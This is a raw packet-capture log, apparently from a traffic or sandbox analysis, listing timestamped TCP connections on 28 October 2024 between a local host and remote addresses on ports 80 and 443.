                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.785315990 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.785316944 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.785327911 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.785331011 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.785346985 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.785360098 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.785362959 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.785372019 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.785403967 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.785752058 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.785767078 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.785782099 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.785797119 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.785814047 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.785828114 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.785830021 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.785847902 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.785856009 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.785875082 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.785895109 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.786329031 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.786345005 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.786359072 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.786372900 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.786390066 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.786405087 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.786412954 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.786421061 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.786432981 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.786434889 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.786449909 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.786449909 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.786467075 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.786482096 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.786488056 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.786498070 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.786501884 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.786528111 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.786555052 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.810275078 CET4434991113.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.810956955 CET4434991113.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.811033964 CET49911443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.811054945 CET49911443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.811059952 CET4434991113.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.811100006 CET49911443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.811104059 CET4434991113.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.814096928 CET49916443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.814130068 CET4434991613.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.814371109 CET49916443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.814481974 CET49916443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.814508915 CET4434991613.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.830874920 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.830938101 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.830940962 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.830952883 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.830992937 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.831522942 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.831537008 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.831552982 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.831595898 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.831623077 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.831657887 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.831681013 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.831693888 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.831696987 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.831712961 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.831731081 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.831734896 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.831779957 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.832107067 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.832197905 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.840903044 CET44349814162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.841077089 CET44349814162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.841573954 CET49814443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.849303007 CET44349813162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.849481106 CET44349813162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.850133896 CET49813443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.918365002 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.918384075 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.918435097 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.918456078 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.918471098 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.918487072 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.918503046 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.918509007 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.918519974 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.918524027 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.918535948 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.918540955 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.918550968 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.918561935 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.918566942 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.918581963 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.918582916 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.918598890 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.918601036 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.918637991 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.918850899 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.918865919 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.918889046 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.918904066 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.918908119 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.918919086 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.918932915 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.918934107 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.918950081 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.918956041 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.918965101 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.918979883 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.918993950 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.918998957 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.919029951 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.919512987 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.919528961 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.919543982 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.919559002 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.919564962 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.919574976 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.919589996 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.919594049 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.919605970 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.919612885 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.919621944 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.919641018 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.919642925 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.919658899 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.919667959 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.919707060 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.919718027 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.919919968 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.919935942 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.919950962 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.919965982 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.919966936 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.919981956 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.919996977 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.920006037 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.920018911 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.920047045 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.920150995 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.920156956 CET4434990720.190.159.0192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.920166016 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.920181990 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.920196056 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.920212030 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.920222044 CET4434990720.190.159.0192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.920227051 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.920242071 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.920242071 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.920258999 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.920274019 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.920289040 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.920312881 CET49907443192.168.2.520.190.159.0
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.920319080 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.920325994 CET4434990720.190.159.0192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.920342922 CET4434990720.190.159.0192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.920393944 CET49907443192.168.2.520.190.159.0
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.921017885 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.921032906 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.921046972 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.921061993 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.921077013 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.921083927 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.921092987 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.921103001 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.921108007 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.921123028 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.921129942 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.921135902 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.921152115 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.921159983 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.921184063 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.921221018 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.921967983 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.921986103 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.921998978 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.922014952 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.922029972 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.922036886 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.922044992 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.922060013 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.922060013 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.922075033 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.922091007 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.922094107 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.922106981 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.922115088 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.922142029 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.922739983 CET49907443192.168.2.520.190.159.0
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.922739983 CET49907443192.168.2.520.190.159.0
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.922748089 CET4434990720.190.159.0192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.922821999 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.922837019 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.922851086 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.922867060 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.922868013 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.922880888 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.922884941 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.922898054 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.922914028 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.922914028 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.922929049 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.922943115 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.922944069 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.922960043 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.922974110 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.922986984 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.923012972 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.923042059 CET4434990720.190.159.0192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.923131943 CET4434990720.190.159.0192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.923441887 CET49907443192.168.2.520.190.159.0
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.924227953 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.924242973 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.924259901 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.924274921 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.924289942 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.924295902 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.924310923 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.924323082 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.924326897 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.924335003 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.924343109 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.924357891 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.924365044 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.924374104 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.924396038 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.924412966 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.925021887 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.925036907 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.925050974 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.925066948 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.925081015 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.925092936 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.925097942 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.925127983 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.925139904 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.941833019 CET49917443192.168.2.520.190.159.0
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.941863060 CET4434991720.190.159.0192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.941926003 CET49917443192.168.2.520.190.159.0
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.942174911 CET49917443192.168.2.520.190.159.0
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.942186117 CET4434991720.190.159.0192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.955549002 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.955615044 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.955781937 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.955796957 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.955893040 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.955925941 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.955941916 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.955956936 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.955972910 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.955986977 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.956010103 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.956037998 CET4987580192.168.2.577.83.175.105
